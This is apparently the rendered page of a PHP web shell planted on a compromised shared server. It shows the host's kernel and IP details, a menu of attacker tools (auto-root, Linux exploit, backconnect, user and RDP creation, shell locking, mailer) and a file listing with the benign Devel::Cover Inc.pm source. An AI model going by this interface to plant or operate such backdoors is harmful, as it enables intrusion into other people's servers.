Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
x86_64-linux-gnu /
perl5 /
5.34 /
Devel /
Cover /
[ HOME SHELL ]
Name
Size
Permission
Action
Annotation
[ DIR ]
drwxr-xr-x
DB
[ DIR ]
drwxr-xr-x
Report
[ DIR ]
drwxr-xr-x
Branch.pm
2.28
KB
-rw-r--r--
Collection.pm
25.29
KB
-rw-r--r--
Condition.pm
1.35
KB
-rw-r--r--
Condition_and_2.pm
1.03
KB
-rw-r--r--
Condition_and_3.pm
1.04
KB
-rw-r--r--
Condition_or_2.pm
1.02
KB
-rw-r--r--
Condition_or_3.pm
1.04
KB
-rw-r--r--
Condition_xor_4.pm
1.03
KB
-rw-r--r--
Criterion.pm
2.71
KB
-rw-r--r--
DB.pm
30.7
KB
-rw-r--r--
Dumper.pm
1.37
KB
-rw-r--r--
Html_Common.pm
884
B
-rw-r--r--
Inc.pm
1.23
KB
-rw-r--r--
Op.pm
2.91
KB
-rw-r--r--
Pod.pm
1.53
KB
-rw-r--r--
Statement.pm
1.19
KB
-rw-r--r--
Subroutine.pm
1.19
KB
-rw-r--r--
Test.pm
14.12
KB
-rw-r--r--
Time.pm
1.53
KB
-rw-r--r--
Truth_Table.pm
15.63
KB
-rw-r--r--
Tutorial.pod
5.24
KB
-rw-r--r--
Util.pm
2.1
KB
-rw-r--r--
Web.pm
28.17
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Inc.pm
# Copyright 2001-2019, Paul Johnson (paul@pjcj.net) # This software is free. It is licensed under the same terms as Perl itself. # The latest version of this software should be available from my homepage: # http://www.pjcj.net # This file was automatically generated by Makefile.PL. package Devel::Cover::Inc; use strict; use warnings; our $VERSION = "1.36"; our $Perl_version = '5.034000'; our @Inc = @{ [ '/etc/perl', '/usr/lib/x86_64-linux-gnu/perl-base', '/usr/lib/x86_64-linux-gnu/perl/5.34.0', '/usr/lib/x86_64-linux-gnu/perl5/5.34', '/usr/share/perl/5.34.0', '/usr/share/perl5' ] }; chomp (our $Perl = <<'EOV'); # Careful with \\ in the path /usr/bin/perl EOV if ($Perl_version ne $]) { print STDERR <<"EOM"; This version of Devel::Cover was built with Perl version $Perl_version. It is now being run with Perl version $]. Attempting to make adjustments, but you may find that some of your modules do not have coverage data collected. You may need to alter the +-inc, +-ignore and +-select options. EOM eval "use Cwd"; my %inc = map { -d $_ ? (($_ eq "." ? $_ : Cwd::abs_path($_)) => 1) : () } @INC; @Inc = sort keys %inc; } # TODO - check for threadedness, 64bits etc. ? 1
Close